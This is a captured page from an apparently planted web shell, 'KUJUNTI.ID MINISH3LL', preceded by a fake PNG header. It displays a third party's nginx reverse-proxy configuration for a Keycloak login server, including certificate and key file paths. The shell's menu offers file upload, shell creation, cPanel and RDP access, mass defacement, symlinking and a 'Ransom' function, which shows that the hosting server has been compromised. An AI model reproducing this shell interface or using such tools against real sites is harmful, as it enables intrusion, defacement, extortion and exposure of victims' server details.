\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 csarite.com
KUJUNTI.ID MINISH3LL
Path : /etc/nginx/sites-enabled/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : //etc/nginx/sites-enabled/keycloak.conf


server {
    # 80. porttan gelen istekleri dinle
    server_name auth.ofisbulutta.tr;

    # Keycloak'a giden istekler için genel konum bloğu
    location / {
        # İstekleri Keycloak'un çalıştığı 127.0.0.1:8080 adresine yönlendir
        proxy_pass http://127.0.0.1:8080;

        # Keycloak'un doğru hostname ve protokolden geldiğini anlaması için GEREKLİ başlıklar:
        
        # 1. Host bilgisini ilet: Keycloak, KC_HOSTNAME'i doğrular.
        proxy_set_header Host $host;

        # 2. Gerçek IP adresini ilet
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

        # 3. Protokol bilgisini ilet (Şu an HTTP, SSL eklenince bu kritikleşecek)
        proxy_set_header X-Forwarded-Proto $scheme; 
        
        # 4. Hostname bilgisini ilet
        proxy_set_header X-Forwarded-Host $host;
        
        # Keepalive bağlantılarını desteklemek için
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";

        # Önbellekleme sorunlarını önler (Keycloak için önemlidir)
        proxy_cache_bypass $http_pragma;
        proxy_cache_revalidate on;

        # Keycloak'un büyük yanıtları için zaman aşımını artır (opsiyonel)
        proxy_connect_timeout 600;
        proxy_send_timeout 600;
        proxy_read_timeout 600;
        send_timeout 600;
    }

    listen [::]:443 ssl; # managed by Certbot
    listen 443 ssl; # managed by Certbot
    ssl_certificate /etc/letsencrypt/live/auth.ofisbulutta.tr/fullchain.pem; # managed by Certbot
    ssl_certificate_key /etc/letsencrypt/live/auth.ofisbulutta.tr/privkey.pem; # managed by Certbot
    include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
    ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot

}
server {
    if ($host = auth.ofisbulutta.tr) {
        return 301 https://$host$request_uri;
    } # managed by Certbot


    listen 80;
    listen [::]:80;
    server_name auth.ofisbulutta.tr;
    return 404; # managed by Certbot


}

© KUJUNTI.ID